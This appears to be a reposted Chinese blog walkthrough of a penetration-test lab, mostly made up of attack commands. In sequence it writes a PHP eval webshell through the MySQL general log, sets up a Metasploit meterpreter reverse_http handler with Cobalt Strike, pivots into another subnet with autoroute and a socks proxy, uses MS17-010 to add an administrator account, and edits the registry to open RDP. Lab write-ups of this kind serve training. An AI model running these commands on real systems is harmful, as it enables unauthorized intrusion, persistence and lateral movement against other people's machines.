📦靶场搭建
📦渗透测试流程
1.目录扫描:
python3 dirsearch.py -u 网站的url
2. 测试mysql数据库连接密码,并进入phpmyadmin
账号:root
密码:root
3.尝试导入一句话木马,发现拒绝导入
select '<?php eval($_POST[hack]);?>' into outfile 'C:/phpstudy/www/hack.php'
导入一句话木马show global variables like '%secure%'
查询有关secure的信息secure_file_priv null
如果这个参数设为一个目录名,MySQL服务只允许在这个目录中执行文件的导入和导出操作。这个目录必须存在,MySQL服务不会创建它;
如果这个参数为NULL,MySQL服务会禁止导入和导出操作
4.通过日志写shell,并用蚁剑连接
show global variables like '%gengeral_%'
查询输出有关general信息set global general_log=ON;
打开日志set global general_log_file='C:/phpStudy/WWW/hack.php'
更改日志路径select '<?php eval($_POST[hack]);?>'
日志写shell“MySQL的session和global一般使用在终端,用来对配置进行暂时设置,当数据库服务重启就会失效。
5.查看当前用户权限为administrators,使用CS上线
6.CS 和MSF联合
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.177.227
set lport 2222
exploit
7.发现其他网段,扫描网段主机,创建代理
run autoroute -s 192.168.52.0/24
创建52网段路由run autoroute -p
查看路由信息
run post/windows/gather/arp_scanner rhosts=192.168.52.0/24
search socks
查找socksuse auxiliary/server/socks_proxy
进入show options
查看信息set VERSION 4a
将版本切换到4aset SRVHOST x
将ip设置为当前ip
7.使用nmap扫描端口,
proxychains nmap -Pn -sT 192.168.52.141
8.发现具有445端口,使用MSF17_010模块添加用户,并添加到管理员用户。
use auxiliary/admin/smb/ms17_010_commandset rhosts 192.168.52.141set COMMAND net user hack Kongbai123 /add
set COMMAND net localgroup administrators
添加到管理员用户
set COMMAND REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f打开目标及3389端口
9.通过远程桌面连接
proxychains rdesktop 192.168.52.141
10.探测域控主机是否开启445端口
利用方法如法炮制,不在复现。
本文发布于:2024-02-01 16:45:28,感谢您对本站的认可!
本文链接:https://www.4u4v.net/it/170677712938033.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
留言与评论(共有 0 条评论) |